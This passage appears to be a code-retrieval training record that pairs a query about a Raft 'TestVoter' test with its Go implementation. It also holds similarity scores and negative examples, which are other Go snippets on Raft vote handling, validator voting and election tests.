log.TraceLevel\n\tlogger.Date = \"\"\n\n\tlogger.Printf(\"Prolly worked\")\n\tif tmpOut.String() != \"Prolly worked\\n\" {\n\t\tt.Errorf(\"Failed to Printf - '%s'\", tmpOut.String())\n\t}\n\ttmpOut.Reset()\n\n\tlogger.Trace(\"Prolly worked\")\n\tif tmpOut.String() != \"TRACE Prolly worked\\n\" {\n\t\tt.Errorf(\"Failed to Printf - '%s'\", tmpOut.String())\n\t}\n\ttmpOut.Reset()\n\n\tlogger.Debug(\"Prolly worked\")\n\tif tmpOut.String() != \"DEBUG Prolly worked\\n\" {\n\t\tt.Errorf(\"Failed to Printf - '%s'\", tmpOut.String())\n\t}\n\ttmpOut.Reset()\n\n\tlogger.Info(\"Prolly worked\")\n\tif tmpOut.String() != \" INFO Prolly worked\\n\" {\n\t\tt.Errorf(\"Failed to Printf - '%s'\", tmpOut.String())\n\t}\n\ttmpOut.Reset()\n\n\tlogger.Warn(\"Prolly worked\")\n\tif tmpOut.String() != \" WARN Prolly worked\\n\" {\n\t\tt.Errorf(\"Failed to Printf - '%s'\", tmpOut.String())\n\t}\n\ttmpOut.Reset()\n\n\tlogger.Error(\"Prolly worked\")\n\tif tmpOut.String() != \"ERROR Prolly worked\\n\" {\n\t\tt.Errorf(\"Failed to Printf - '%s'\", tmpOut.String())\n\t}\n\ttmpOut.Reset()\n\n\tlogger.Fatal(\"Prolly worked\")\n\tif tmpOut.String() != \"FATAL Prolly worked\\n\" {\n\t\tt.Errorf(\"Failed to Printf - '%s'\", tmpOut.String())\n\t}\n\ttmpOut.Reset()\n\n\tlogger.Date = \"2006-01-02 15:04:05.00000\"\n\tlogger.Trace(\"Prolly worked\")\n\tlogger.Debug(\"Prolly worked\")\n\tlogger.Info(\"Prolly worked\")\n\tlogger.Warn(\"Prolly worked\")\n\tlogger.Error(\"Prolly worked\")\n\tlogger.Fatal(\"Prolly worked\")\n}" ]
[ "0.66216356", "0.642609", "0.642562", "0.6424496", "0.63664854", "0.62123907", "0.614392", "0.6084621", "0.59841955", "0.58548945", "0.581514", "0.573651", "0.57138723", "0.57014894", "0.5697903", "0.56343067", "0.55782557", "0.55703485", "0.55664957", "0.55110955", "0.5447062", "0.54409426", "0.53672296", "0.5357864", "0.5328268", "0.5327363", "0.53192943", "0.53086305", "0.5290898", "0.52870446", "0.52797943", "0.5278107", "0.5274589", "0.5268426", "0.5267248", "0.52451396", "0.52292615", "0.52278763", "0.52147514", "0.5207595", "0.5203358", "0.51868194", "0.5172968", "0.5171794", "0.51714045", "0.51654196", "0.516471", "0.5154644", "0.5153369", "0.5146379", "0.5145921", "0.51329756", "0.5119943", "0.5103437", "0.5091181", "0.50863034", "0.50713235", "0.50688565", "0.50642097", "0.5044897", "0.5031335", "0.5030397", "0.50292796", "0.50227445", "0.5012862", "0.50018674", "0.49884674", "0.49834535", "0.4962328", "0.49616092", "0.4942977", "0.49378464", "0.4932934", "0.49308822", "0.49274272", "0.4914916", "0.4905887", "0.49044144", "0.49004394", "0.4899603", "0.48905626", "0.48849204", "0.48846352", "0.48844463", "0.48764032", "0.48682183", "0.48459265", "0.48357993", "0.48354596", "0.48336503", "0.48309007", "0.4825976", "0.48257202", "0.48248208", "0.48181304", "0.48161584", "0.48095408", "0.48043182", "0.48043054", "0.48042876" ]
0.7571284
0
TestVoter tests the voter denies its vote if its own log is more uptodate than that of the candidate. Reference: section 5.4.1
func TestVoter(t *testing.T) { tests := []struct { ents []pb.Entry logterm uint64 index uint64 wreject bool }{ // same logterm {[]pb.Entry{{Term: 1, Index: 1}}, 1, 1, false}, {[]pb.Entry{{Term: 1, Index: 1}}, 1, 2, false}, {[]pb.Entry{{Term: 1, Index: 1}, {Term: 1, Index: 2}}, 1, 1, true}, // candidate higher logterm {[]pb.Entry{{Term: 1, Index: 1}}, 2, 1, false}, {[]pb.Entry{{Term: 1, Index: 1}}, 2, 2, false}, {[]pb.Entry{{Term: 1, Index: 1}, {Term: 1, Index: 2}}, 2, 1, false}, // voter higher logterm {[]pb.Entry{{Term: 2, Index: 1}}, 1, 1, true}, {[]pb.Entry{{Term: 2, Index: 1}}, 1, 2, true}, {[]pb.Entry{{Term: 2, Index: 1}, {Term: 1, Index: 2}}, 1, 1, true}, } for i, tt := range tests { storage := NewMemoryStorage() storage.Append(tt.ents) r := newTestRaft(1, []uint64{1, 2}, 10, 1, storage) defer closeAndFreeRaft(r) r.Step(pb.Message{From: 2, To: 1, Type: pb.MsgVote, Term: 3, LogTerm: tt.logterm, Index: tt.index}) msgs := r.readMessages() if len(msgs) != 1 { t.Fatalf("#%d: len(msg) = %d, want %d", i, len(msgs), 1) } m := msgs[0] if m.Type != pb.MsgVoteResp { t.Errorf("#%d: msgType = %d, want %d", i, m.Type, pb.MsgVoteResp) } if m.Reject != tt.wreject { t.Errorf("#%d: reject = %t, want %t", i, m.Reject, tt.wreject) } } }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func TestVoter_Vote(t *testing.T) {\n\tallia := sdk.NewOntologySdk()\n\tallia.NewRpcClient().SetAddress(RpcAddr)\n\tvoting := make(chan *btc.BtcProof, 10)\n\n\tacct, err := GetAccountByPassword(allia, \"../cmd/lightcli/wallet.dat\", \"passwordtest\")\n\tif err != nil {\n\t\tt.Fatalf(\"Failed to get acct: %v\", err)\n\t}\n\n\tconf := spvwallet.NewDefaultConfig()\n\tconf.RepoPath = \"./\"\n\tconf.Params = &chaincfg.TestNet3Params\n\tsqliteDatastore, err := db.Create(conf.RepoPath)\n\tif err != nil {\n\t\tt.Fatalf(\"failed to create sqlite db: %v\", err)\n\t}\n\tconf.DB = sqliteDatastore\n\twallet, _ := spvwallet.NewSPVWallet(conf)\n\tredeem, _ := hex.DecodeString(\"5521023ac710e73e1410718530b2686ce47f12fa3c470a9eb6085976b70b01c64c9f732102c9dc4d8f419e325bbef0fe039ed6feaf2079a2ef7b27336ddb79be2ea6e334bf2102eac939f2f0873894d8bf0ef2f8bbdd32e4290cbf9632b59dee743529c0af9e802103378b4a3854c88cca8bfed2558e9875a144521df4a75ab37a206049ccef12be692103495a81957ce65e3359c114e6c2fe9f97568be491e3f24d6fa66cc542e360cd662102d43e29299971e802160a92cfcd4037e8ae83fb8f6af138684bebdc5686f3b9db21031e415c04cbc9b81fbee6e04d8c902e8f61109a2c9883a959ba528c52698c055a57ae\")\n\n\twallet.Start()\n\tdefer func() {\n\t\twallet.Close()\n\t\tos.RemoveAll(\"./peers.json\")\n\t\tos.RemoveAll(\"./waiting.bin\")\n\t\tos.RemoveAll(\"./headers.bin\")\n\t\tos.RemoveAll(\"./wallet.db\")\n\t}()\n\n\tquit := make(chan struct{})\n\tv, err := NewVoter(allia, voting, wallet, redeem, acct, 0, 20000, \"\", 6, quit)\n\tif err != nil {\n\t\tt.Fatalf(\"failed to new voter: %v\", err)\n\t}\n\n\tgo v.Vote()\n\tgo v.WaitingRetry()\n\n\tsink := common.NewZeroCopySink(nil)\n\tBp1.Serialization(sink)\n\n\tgo func() {\n\t\tfor {\n\t\t\tvoting <- Bp1\n\t\t\ttime.Sleep(2 * time.Second)\n\t\t}\n\t}()\n\n\ttime.Sleep(time.Second * 10)\n}", "func TestElection_HasVoted(t *testing.T) {\n\ttestDatabase := database.StormDB{\n\t\tFile: \"election_testdb.db\",\n\t}\n\terr := testDatabase.Connect()\n\tif err != nil {\n\t\tt.Errorf(\"Couldn't connect to database. Error: %s\", err.Error())\n\t}\n\ttestVoter := models.Voter{\n\t\tStudentID: 1,\n\t\tCohort: 1,\n\t\tName: \"Prof Sturman\",\n\t}\n\ttestVoterWontVote := models.Voter{\n\t\tStudentID: 2,\n\t\tCohort: 1,\n\t\tName: \"Prof Goldschmidt\",\n\t}\n\ttestCandidate := models.Candidate{\n\t\tID: 1,\n\t\tCohort: 1,\n\t\tName: \"Joey Lyon\",\n\t}\n\n\terr = testDatabase.StoreVoter(testVoter)\n\tif err != nil {\n\t\tt.Errorf(\"Couldn't add test voter to database\")\n\t}\n\terr = testDatabase.StoreVoter(testVoterWontVote)\n\tif err != nil {\n\t\tt.Errorf(\"Couldn't add test voter to database\")\n\t}\n\terr = testDatabase.StoreCandidate(testCandidate)\n\tif err != nil {\n\t\tt.Errorf(\"Couldn't add test candidate to database\")\n\t}\n\n\te := New(&testDatabase, false, []string{})\n\t// Begin testing HasVoted function\n\tret, err := e.HasVoted(testVoter)\n\tif err != nil {\n\t\tt.Errorf(\"unexpected error in checking if voter has voted\")\n\t}\n\tif *ret {\n\t\tt.Errorf(\"HasVoted returned true when a voter hasn't voted\")\n\t}\n\n\tvote := &models.Vote{\n\t\tCandidate: 1,\n\t\tStudentID: 1,\n\t}\n\tvote.HashVote(&testVoter)\n\te.CastVotes(&testVoter, []models.Vote{*vote})\n\tret, err = e.HasVoted(testVoter)\n\tif err != nil {\n\t\tt.Errorf(\"unexpected error in checking if voter has voted\")\n\t}\n\tif *ret == false {\n\t\tt.Errorf(\"HasVoted returned false when a voter has voted\")\n\t}\n\n\tret, err = e.HasVoted(testVoterWontVote)\n\tif err != nil {\n\t\tt.Errorf(\"unexpected error in checking if voter has voted\")\n\t}\n\tif *ret {\n\t\tt.Errorf(\"HasVoted returned true when a voter has not voted\")\n\t}\n\terr = os.Remove(\"election_testdb.db\")\n\tif err != nil {\n\t\tt.Log(\"Cleanup failed\")\n\t}\n}", "func TestVoting(t *testing.T) {\n\t// Define the various voting scenarios to test\n\ttests := []struct {\n\t\tepoch uint64\n\t\tvalidators []string\n\t\tvotes []testerVote\n\t\tresults []string\n\t}{\n\t\t{\n\t\t\t// Single validator, no votes cast\n\t\t\tvalidators: []string{\"A\"},\n\t\t\tvotes: []testerVote{{validator: \"A\"}},\n\t\t\tresults: []string{\"A\"},\n\t\t}, {\n\t\t\t// Single validator, voting to add two others (only accept first, second needs 2 votes)\n\t\t\tvalidators: []string{\"A\"},\n\t\t\tvotes: []testerVote{\n\t\t\t\t{validator: \"A\", voted: \"B\", auth: true},\n\t\t\t\t{validator: \"B\"},\n\t\t\t\t{validator: \"A\", voted: \"C\", auth: true},\n\t\t\t},\n\t\t\tresults: []string{\"A\", \"B\"},\n\t\t}, {\n\t\t\t// Two validators, voting to add three others (only accept first two, third needs 3 votes already)\n\t\t\tvalidators: []string{\"A\", \"B\"},\n\t\t\tvotes: []testerVote{\n\t\t\t\t{validator: \"A\", voted: \"C\", auth: true},\n\t\t\t\t{validator: \"B\", voted: \"C\", auth: true},\n\t\t\t\t{validator: \"A\", voted: \"D\", auth: true},\n\t\t\t\t{validator: \"B\", voted: \"D\", auth: true},\n\t\t\t\t{validator: \"C\"},\n\t\t\t\t{validator: \"A\", voted: \"E\", auth: true},\n\t\t\t\t{validator: \"B\", voted: \"E\", auth: true},\n\t\t\t},\n\t\t\tresults: []string{\"A\", \"B\", \"C\", \"D\"},\n\t\t}, {\n\t\t\t// Single validator, dropping itself (weird, but one less cornercase by explicitly allowing this)\n\t\t\tvalidators: []string{\"A\"},\n\t\t\tvotes: []testerVote{\n\t\t\t\t{validator: \"A\", voted: \"A\", auth: false},\n\t\t\t},\n\t\t\tresults: []string{},\n\t\t}, {\n\t\t\t// Two validators, actually needing mutual consent to drop either of them (not fulfilled)\n\t\t\tvalidators: []string{\"A\", \"B\"},\n\t\t\tvotes: []testerVote{\n\t\t\t\t{validator: \"A\", voted: \"B\", auth: false},\n\t\t\t},\n\t\t\tresults: []string{\"A\", \"B\"},\n\t\t}, {\n\t\t\t// Two validators, actually needing mutual consent to drop either of them (fulfilled)\n\t\t\tvalidators: []string{\"A\", \"B\"},\n\t\t\tvotes: []testerVote{\n\t\t\t\t{validator: \"A\", voted: \"B\", auth: false},\n\t\t\t\t{validator: \"B\", voted: \"B\", auth: false},\n\t\t\t},\n\t\t\tresults: []string{\"A\"},\n\t\t}, {\n\t\t\t// Three validators, two of them deciding to drop the third\n\t\t\tvalidators: []string{\"A\", \"B\", \"C\"},\n\t\t\tvotes: []testerVote{\n\t\t\t\t{validator: \"A\", voted: \"C\", auth: false},\n\t\t\t\t{validator: \"B\", voted: \"C\", auth: false},\n\t\t\t},\n\t\t\tresults: []string{\"A\", \"B\"},\n\t\t}, {\n\t\t\t// Four validators, consensus of two not being enough to drop anyone\n\t\t\tvalidators: []string{\"A\", \"B\", \"C\", \"D\"},\n\t\t\tvotes: []testerVote{\n\t\t\t\t{validator: \"A\", voted: \"C\", auth: false},\n\t\t\t\t{validator: \"B\", voted: \"C\", auth: false},\n\t\t\t},\n\t\t\tresults: []string{\"A\", \"B\", \"C\", \"D\"},\n\t\t}, {\n\t\t\t// Four validators, consensus of three already being enough to drop someone\n\t\t\tvalidators: []string{\"A\", \"B\", \"C\", \"D\"},\n\t\t\tvotes: []testerVote{\n\t\t\t\t{validator: \"A\", voted: \"D\", auth: false},\n\t\t\t\t{validator: \"B\", voted: \"D\", auth: false},\n\t\t\t\t{validator: \"C\", voted: \"D\", auth: false},\n\t\t\t},\n\t\t\tresults: []string{\"A\", \"B\", \"C\"},\n\t\t}, {\n\t\t\t// Authorizations are counted once per validator per target\n\t\t\tvalidators: []string{\"A\", \"B\"},\n\t\t\tvotes: []testerVote{\n\t\t\t\t{validator: \"A\", voted: \"C\", auth: true},\n\t\t\t\t{validator: \"B\"},\n\t\t\t\t{validator: \"A\", voted: \"C\", auth: true},\n\t\t\t\t{validator: \"B\"},\n\t\t\t\t{validator: \"A\", voted: \"C\", auth: true},\n\t\t\t},\n\t\t\tresults: []string{\"A\", \"B\"},\n\t\t}, {\n\t\t\t// Authorizing multiple accounts concurrently is permitted\n\t\t\tvalidators: []string{\"A\", \"B\"},\n\t\t\tvotes: []testerVote{\n\t\t\t\t{validator: \"A\", voted: \"C\", auth: true},\n\t\t\t\t{validator: \"B\"},\n\t\t\t\t{validator: \"A\", voted: \"D\", auth: true},\n\t\t\t\t{validator: \"B\"},\n\t\t\t\t{validator: \"A\"},\n\t\t\t\t{validator: \"B\", voted: \"D\", auth: true},\n\t\t\t\t{validator: \"A\"},\n\t\t\t\t{validator: \"B\", voted: \"C\", auth: true},\n\t\t\t},\n\t\t\tresults: []string{\"A\", \"B\", \"C\", \"D\"},\n\t\t}, {\n\t\t\t// Deauthorizations are counted once per validator per target\n\t\t\tvalidators: []string{\"A\", \"B\"},\n\t\t\tvotes: []testerVote{\n\t\t\t\t{validator: \"A\", voted: \"B\", auth: false},\n\t\t\t\t{validator: \"B\"},\n\t\t\t\t{validator: \"A\", voted: \"B\", auth: false},\n\t\t\t\t{validator: \"B\"},\n\t\t\t\t{validator: \"A\", voted: \"B\", auth: false},\n\t\t\t},\n\t\t\tresults: []string{\"A\", \"B\"},\n\t\t}, {\n\t\t\t// Deauthorizing multiple accounts concurrently is permitted\n\t\t\tvalidators: []string{\"A\", \"B\", \"C\", \"D\"},\n\t\t\tvotes: []testerVote{\n\t\t\t\t{validator: \"A\", voted: \"C\", auth: false},\n\t\t\t\t{validator: \"B\"},\n\t\t\t\t{validator: \"C\"},\n\t\t\t\t{validator: \"A\", voted: \"D\", auth: false},\n\t\t\t\t{validator: \"B\"},\n\t\t\t\t{validator: \"C\"},\n\t\t\t\t{validator: \"A\"},\n\t\t\t\t{validator: \"B\", voted: \"D\", auth: false},\n\t\t\t\t{validator: \"C\", voted: \"D\", auth: false},\n\t\t\t\t{validator: \"A\"},\n\t\t\t\t{validator: \"B\", voted: \"C\", auth: false},\n\t\t\t},\n\t\t\tresults: []string{\"A\", \"B\"},\n\t\t}, {\n\t\t\t// Votes from deauthorized validators are discarded immediately (deauth votes)\n\t\t\tvalidators: []string{\"A\", \"B\", \"C\"},\n\t\t\tvotes: []testerVote{\n\t\t\t\t{validator: \"C\", voted: \"B\", auth: false},\n\t\t\t\t{validator: \"A\", voted: \"C\", auth: false},\n\t\t\t\t{validator: \"B\", voted: \"C\", auth: false},\n\t\t\t\t{validator: \"A\", voted: \"B\", auth: false},\n\t\t\t},\n\t\t\tresults: []string{\"A\", \"B\"},\n\t\t}, {\n\t\t\t// Votes from deauthorized validators are discarded immediately (auth votes)\n\t\t\tvalidators: []string{\"A\", \"B\", \"C\"},\n\t\t\tvotes: []testerVote{\n\t\t\t\t{validator: \"C\", voted: \"B\", auth: false},\n\t\t\t\t{validator: \"A\", voted: \"C\", auth: false},\n\t\t\t\t{validator: \"B\", voted: \"C\", auth: false},\n\t\t\t\t{validator: \"A\", voted: \"B\", auth: false},\n\t\t\t},\n\t\t\tresults: []string{\"A\", \"B\"},\n\t\t}, {\n\t\t\t// Cascading changes are not allowed, only the the account being voted on may change\n\t\t\tvalidators: []string{\"A\", \"B\", \"C\", \"D\"},\n\t\t\tvotes: []testerVote{\n\t\t\t\t{validator: \"A\", voted: \"C\", auth: false},\n\t\t\t\t{validator: \"B\"},\n\t\t\t\t{validator: \"C\"},\n\t\t\t\t{validator: \"A\", voted: \"D\", auth: false},\n\t\t\t\t{validator: \"B\", voted: \"C\", auth: false},\n\t\t\t\t{validator: \"C\"},\n\t\t\t\t{validator: \"A\"},\n\t\t\t\t{validator: \"B\", voted: \"D\", auth: false},\n\t\t\t\t{validator: \"C\", voted: \"D\", auth: false},\n\t\t\t},\n\t\t\tresults: []string{\"A\", \"B\", \"C\"},\n\t\t}, {\n\t\t\t// Changes reaching consensus out of bounds (via a deauth) execute on touch\n\t\t\tvalidators: []string{\"A\", \"B\", \"C\", \"D\"},\n\t\t\tvotes: []testerVote{\n\t\t\t\t{validator: \"A\", voted: \"C\", auth: false},\n\t\t\t\t{validator: \"B\"},\n\t\t\t\t{validator: \"C\"},\n\t\t\t\t{validator: \"A\", voted: \"D\", auth: false},\n\t\t\t\t{validator: \"B\", voted: \"C\", auth: false},\n\t\t\t\t{validator: \"C\"},\n\t\t\t\t{validator: \"A\"},\n\t\t\t\t{validator: \"B\", voted: \"D\", auth: false},\n\t\t\t\t{validator: \"C\", voted: \"D\", auth: false},\n\t\t\t\t{validator: \"A\"},\n\t\t\t\t{validator: \"C\", voted: \"C\", auth: true},\n\t\t\t},\n\t\t\tresults: []string{\"A\", \"B\"},\n\t\t}, {\n\t\t\t// Changes reaching consensus out of bounds (via a deauth) may go out of consensus on first touch\n\t\t\tvalidators: []string{\"A\", \"B\", \"C\", \"D\"},\n\t\t\tvotes: []testerVote{\n\t\t\t\t{validator: \"A\", voted: \"C\", auth: false},\n\t\t\t\t{validator: \"B\"},\n\t\t\t\t{validator: \"C\"},\n\t\t\t\t{validator: \"A\", voted: \"D\", auth: false},\n\t\t\t\t{validator: \"B\", voted: \"C\", auth: false},\n\t\t\t\t{validator: \"C\"},\n\t\t\t\t{validator: \"A\"},\n\t\t\t\t{validator: \"B\", voted: \"D\", auth: false},\n\t\t\t\t{validator: \"C\", voted: \"D\", auth: false},\n\t\t\t\t{validator: \"A\"},\n\t\t\t\t{validator: \"B\", voted: \"C\", auth: true},\n\t\t\t},\n\t\t\tresults: []string{\"A\", \"B\", \"C\"},\n\t\t}, {\n\t\t\t// Ensure that pending votes don't survive authorization status changes. This\n\t\t\t// corner case can only appear if a validator is quickly added, remove and then\n\t\t\t// readded (or the inverse), while one of the original voters dropped. If a\n\t\t\t// past vote is left cached in the system somewhere, this will interfere with\n\t\t\t// the final validator outcome.\n\t\t\tvalidators: []string{\"A\", \"B\", \"C\", \"D\", \"E\"},\n\t\t\tvotes: []testerVote{\n\t\t\t\t{validator: \"A\", voted: \"F\", auth: true}, // Authorize F, 3 votes needed\n\t\t\t\t{validator: \"B\", voted: \"F\", auth: true},\n\t\t\t\t{validator: \"C\", voted: \"F\", auth: true},\n\t\t\t\t{validator: \"D\", voted: \"F\", auth: false}, // Deauthorize F, 4 votes needed (leave A's previous vote \"unchanged\")\n\t\t\t\t{validator: \"E\", voted: \"F\", auth: false},\n\t\t\t\t{validator: \"B\", voted: \"F\", auth: false},\n\t\t\t\t{validator: \"C\", voted: \"F\", auth: false},\n\t\t\t\t{validator: \"D\", voted: \"F\", auth: true}, // Almost authorize F, 2/3 votes needed\n\t\t\t\t{validator: \"E\", voted: \"F\", auth: true},\n\t\t\t\t{validator: \"B\", voted: \"A\", auth: false}, // Deauthorize A, 3 votes needed\n\t\t\t\t{validator: \"C\", voted: \"A\", auth: false},\n\t\t\t\t{validator: \"D\", voted: \"A\", auth: false},\n\t\t\t\t{validator: \"B\", voted: \"F\", auth: true}, // Finish authorizing F, 3/3 votes needed\n\t\t\t},\n\t\t\tresults: []string{\"B\", \"C\", \"D\", \"E\", \"F\"},\n\t\t}, {\n\t\t\t// Epoch transitions reset all votes to allow chain checkpointing\n\t\t\tepoch: 3,\n\t\t\tvalidators: []string{\"A\", \"B\"},\n\t\t\tvotes: []testerVote{\n\t\t\t\t{validator: \"A\", voted: \"C\", auth: true},\n\t\t\t\t{validator: \"B\"},\n\t\t\t\t{validator: \"A\"}, // Checkpoint block, (don't vote here, it's validated outside of snapshots)\n\t\t\t\t{validator: \"B\", voted: \"C\", auth: true},\n\t\t\t},\n\t\t\tresults: []string{\"A\", \"B\"},\n\t\t},\n\t}\n\n\t// Run through the scenarios and test them\n\tfor i, tt := range tests {\n\t\t// Create the account pool and generate the initial set of validators\n\t\taccounts := newTesterAccountPool()\n\n\t\tvalidators := make([]common.Address, len(tt.validators))\n\t\tfor j, validator := range tt.validators {\n\t\t\tvalidators[j] = accounts.address(validator)\n\t\t}\n\t\tfor j := 0; j < len(validators); j++ {\n\t\t\tfor k := j + 1; k < len(validators); k++ {\n\t\t\t\tif bytes.Compare(validators[j][:], validators[k][:]) > 0 {\n\t\t\t\t\tvalidators[j], validators[k] = validators[k], validators[j]\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\tgenesis := testutils.Genesis(validators, true)\n\t\tconfig := new(istanbul.Config)\n\t\t*config = *istanbul.DefaultConfig\n\t\tconfig.TestQBFTBlock = big.NewInt(0)\n\t\tif tt.epoch != 0 {\n\t\t\tconfig.Epoch = tt.epoch\n\t\t}\n\n\t\tchain, backend := newBlockchainFromConfig(\n\t\t\tgenesis,\n\t\t\t[]*ecdsa.PrivateKey{accounts.accounts[tt.validators[0]]},\n\t\t\tconfig,\n\t\t)\n\n\t\t// Assemble a chain of headers from the cast votes\n\t\theaders := make([]*types.Header, len(tt.votes))\n\t\tfor j, vote := range tt.votes {\n\t\t\tblockNumber := big.NewInt(int64(j) + 1)\n\t\t\theaders[j] = &types.Header{\n\t\t\t\tNumber: blockNumber,\n\t\t\t\tTime: uint64(int64(j) * int64(config.GetConfig(blockNumber).BlockPeriod)),\n\t\t\t\tCoinbase: accounts.address(vote.validator),\n\t\t\t\tDifficulty: istanbulcommon.DefaultDifficulty,\n\t\t\t\tMixDigest: types.IstanbulDigest,\n\t\t\t}\n\t\t\t_ = qbftengine.ApplyHeaderQBFTExtra(\n\t\t\t\theaders[j],\n\t\t\t\tqbftengine.WriteValidators(validators),\n\t\t\t)\n\n\t\t\tif j > 0 {\n\t\t\t\theaders[j].ParentHash = headers[j-1].Hash()\n\t\t\t}\n\n\t\t\tcopy(headers[j].Extra, genesis.ExtraData)\n\n\t\t\tif len(vote.voted) > 0 {\n\t\t\t\tif err := accounts.writeValidatorVote(headers[j], vote.validator, vote.voted, vote.auth); err != nil {\n\t\t\t\t\tt.Errorf(\"Error writeValidatorVote test: %d, validator: %s, voteType: %v (err=%v)\", j, vote.voted, vote.auth, err)\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\t// Pass all the headers through clique and ensure tallying succeeds\n\t\thead := headers[len(headers)-1]\n\n\t\tsnap, err := backend.snapshot(chain, head.Number.Uint64(), head.Hash(), headers)\n\t\tif err != nil {\n\t\t\tt.Errorf(\"test %d: failed to create voting snapshot: %v\", i, err)\n\t\t\tbackend.Stop()\n\t\t\tcontinue\n\t\t}\n\t\t// Verify the final list of validators against the expected ones\n\t\tvalidators = make([]common.Address, len(tt.results))\n\t\tfor j, validator := range tt.results {\n\t\t\tvalidators[j] = accounts.address(validator)\n\t\t}\n\t\tfor j := 0; j < len(validators); j++ {\n\t\t\tfor k := j + 1; k < len(validators); k++ {\n\t\t\t\tif bytes.Compare(validators[j][:], validators[k][:]) > 0 {\n\t\t\t\t\tvalidators[j], validators[k] = validators[k], validators[j]\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\tresult := snap.validators()\n\t\tif len(result) != len(validators) {\n\t\t\tt.Errorf(\"test %d: validators mismatch: have %x, want %x\", i, result, validators)\n\t\t\tbackend.Stop()\n\t\t\tcontinue\n\t\t}\n\t\tfor j := 0; j < len(result); j++ {\n\t\t\tif !bytes.Equal(result[j][:], validators[j][:]) {\n\t\t\t\tt.Errorf(\"test %d, validator %d: validator mismatch: have %x, want %x\", i, j, result[j], validators[j])\n\t\t\t}\n\t\t}\n\t\tbackend.Stop()\n\t}\n}", "func TestRaft_SlowRecvVote(t *testing.T) {\n\thooks := NewSlowVoter(\"svr_1\", \"svr_4\", \"svr_3\")\n\thooks.mode = SlowRecv\n\tcluster := newRaftCluster(t, testLogWriter, \"svr\", 5, hooks)\n\ts := newApplySource(\"SlowRecvVote\")\n\tac := cluster.ApplyN(t, time.Minute, s, 10000)\n\tcluster.Stop(t, time.Minute)\n\thooks.Report(t)\n\tcluster.VerifyLog(t, ac)\n\tcluster.VerifyFSM(t)\n}", "func CheckVoter(userID, safeword string, dbc *mongo.Client) (VoterVote, error) {\r\n\tu, err := primitive.ObjectIDFromHex(userID)\r\n\tif err != nil {\r\n\t\treturn VoterVote{true, false}, err\r\n\t}\r\n\r\n\tr := struct {\r\n\t\tHasVoted bool `bson:\"hasVoted\"`\r\n\t\tSafeword string `bson:\"safeword\"`\r\n\t\tHash string `bson:\"hash\"`\r\n\t}{}\r\n\terr = dbc.Database(\"aye-go\").Collection(\"voter\").FindOne(context.Background(), bson.M{\"_id\": u}).Decode(&r)\r\n\r\n\t// cause for rejection\r\n\tif r.HasVoted || err == mongo.ErrNoDocuments {\r\n\t\treturn VoterVote{r.HasVoted, false}, nil\r\n\t}\r\n\r\n\t// unintended error\r\n\tif err != nil {\r\n\t\treturn VoterVote{r.HasVoted, false}, err\r\n\t}\r\n\r\n\thsw := md5.Sum([]byte(safeword + r.Hash))\r\n\r\n\t// all clear\r\n\treturn VoterVote{r.HasVoted, fmt.Sprintf(\"%x\", hsw) != r.Safeword}, nil\r\n}", "func (rf *Raft) Vote(args VoteArgs, reply *VoteReply) {\n\t// Your code here.\n\t// fmt.Printf(\"VOTE : %v get from %v\\n\", rf.me, args.CandidateID)\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\treply.Term = rf.currentTerm\n\treply.VoteGranted = false\n\t//Receiver implementation 1\n\tif args.Term < rf.currentTerm {\n\t\t// fmt.Printf(\"VOTE_DENY1 : %v get from %v with %v %v\\n\", rf.me, args.CandidateID, rf.currentTerm, args.Term)\n\t\treturn\n\t}\n\t// args.Term > currentTerm, so update it\n\tif args.Term > rf.currentTerm {\n\t\trf.currentTerm = args.Term\n\t\trf.toFollower()\n\t\trf.persist()\n\t}\n\t//Receiver implementation 2\n\tif !(rf.voteFor == -1 || rf.voteFor == args.CandidateID) {\n\t\t// fmt.Printf(\"VOTE_DENY3 : %v get from %v, voteFor %v %v\\n\", rf.me, args.CandidateID, rf.voteFor, args.CandidateID)\n\t\treturn\n\t}\n\tlastLog := rf.log[len(rf.log)-1]\n\tif args.LastLogTerm < lastLog.Term {\n\t\t// fmt.Printf(\"VOTE_DENY2 : %v get from %v with term %v < %v %v\\n\", rf.me, args.CandidateID, lastLog.Term, args.LastLogTerm, args.LastLogTerm < lastLog.Term)\n\t\treturn\n\t}\n\n\tif args.LastLogTerm == lastLog.Term && len(rf.log) > args.LastLogIndex {\n\t\t// fmt.Printf(\"VOTE_DENY2 : %v get from %v with index %v <= %v %v\\n\", rf.me, args.CandidateID, len(rf.log), args.LastLogIndex, args.LastLogIndex < len(rf.log))\n\t\treturn\n\t}\n\n\t// if rf.voteFor == -1 {\n\t// \tlastLog = rf.log[len(rf.log)-1]\n\t// \tif args.LastLogTerm >= lastLog.Term && args.LastLogIndex >= len(rf.log) {\n\trf.toFollower()\n\treply.VoteGranted = true\n\trf.voteFor = args.CandidateID\n\trf.heartbeatChan <- true\n\trf.persist()\n\t// }\n\t// }\n\n}", "func TestRaft_SlowSendVote(t *testing.T) {\n\thooks := NewSlowVoter(\"sv_0\", \"sv_1\")\n\tcluster := newRaftCluster(t, testLogWriter, \"sv\", 5, hooks)\n\ts := newApplySource(\"SlowSendVote\")\n\tac := cluster.ApplyN(t, time.Minute, s, 10000)\n\tcluster.Stop(t, time.Minute)\n\thooks.Report(t)\n\tcluster.VerifyLog(t, ac)\n\tcluster.VerifyFSM(t)\n}", "func TestLearnerCannotVote(t *testing.T) {\n\tn2 := newTestLearnerRaft(2, []uint64{1}, []uint64{2}, 10, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(n2)\n\n\tn2.becomeFollower(1, None)\n\n\tn2.Step(pb.Message{From: 1, To: 2, Term: 2, Type: pb.MsgVote, LogTerm: 11, Index: 11})\n\n\tif len(n2.msgs) != 0 {\n\t\tt.Errorf(\"expect learner not to vote, but received %v messages\", n2.msgs)\n\t}\n}", "func (_Contracts *ContractsTransactor) VerifyVoter(opts *bind.TransactOpts, _proposal *big.Int, _positionId *big.Int, _voterId *big.Int, _voterAddr common.Address) (*types.Transaction, error) {\n\treturn _Contracts.contract.Transact(opts, \"VerifyVoter\", _proposal, _positionId, _voterId, _voterAddr)\n}", "func (rf *Raft) isCandidateUpToDate(args *RequestVoteArgs) bool {\n\t/*\n\tRaft determines which of two logs is more up-to-date by\n\tcomparing the index and term of the last entries in the logs.\n\tIf the logs have last entries with different terms, then the log with the\n\tlater term is more 